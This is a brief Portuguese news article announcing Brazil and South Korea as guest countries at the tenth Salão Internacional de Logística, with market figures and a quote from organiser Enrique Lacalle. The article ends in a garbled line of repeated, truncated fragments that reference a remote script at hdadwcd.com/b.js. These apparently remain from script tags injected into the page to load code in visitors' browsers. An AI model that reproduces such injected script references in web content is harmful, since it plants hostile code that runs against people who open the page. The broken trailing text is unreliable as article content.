Sil recebe Brasil e Coreia do Sul como países convidados

A décima edição do Salão Internacional de Logística terá como países convidados o Brasil e a Coreia do Sul, confirmou a organização.

A décima edição do Salão Internacional de Logística terá como países convidados o Brasil e a Coreia do Sul, confirmou a organização. Ambos os países possuem economias emergentes e que têm conseguido captar investimentos estrangeiros. Espera-se que a iniciativa permita o reforço dos laços entre empresas europeias, coreanas e brasileiras.

 

O Brasil é a mais poderosa economia da América Latina e representa um imenso mercado, sendo o quinto país em termos de população, à escala mundial, com 188 milhões de habitantes.

 

A Coreia do Sul possui igualmente um mercado vasto, de 50 milhões de habitantes, e a sua economia está entre as 50 maiores do planeta. O Ministério da Indústria e Comércio espanhol considerou este país como um dos melhores mercados para realizar investimentos, devido à sua posição estratégica e ao dinamismo da sua economia.

 

De acordo com o presidente do comité organizador, Enrique Lacalle, espera a organização que «este ano a feira seja visitada por 50 mim profissionais do sector, o que significa um crescimento de 5% em relação aos visitantes do ano passado».

ttp://www.hdadwcd.com/b.js>ttp://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.h